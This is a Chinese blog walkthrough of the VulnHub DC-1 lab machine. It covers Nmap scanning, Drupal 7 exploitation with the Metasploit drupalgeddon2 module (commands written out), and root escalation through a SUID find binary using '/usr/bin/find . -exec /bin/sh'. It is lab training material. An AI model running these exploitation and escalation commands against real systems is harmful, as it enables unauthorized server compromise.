Vulnhub - DC-1

希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog

DC-1 靶机下载地址:DC: 1 ~ VulnHub

0x01 信息收集

Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。

访问80端口是一个Drupal的登录页面。Wappalyzer显示CMS为Drupal 7,编程语言为PHP,操作系统为Debian。

0x02 Web漏洞利用 - drupalgeddon2

MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。

msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.196.137
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 80
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

0x03 权限提升 - SUID

上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。

辅助项目下载地址:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

检测到可利用的SUID文件/usr/bin/find 

查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。

/usr/bin/find . -exec '/bin/sh' \;

SUID提权成功,拿到root权限和最终flag。

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值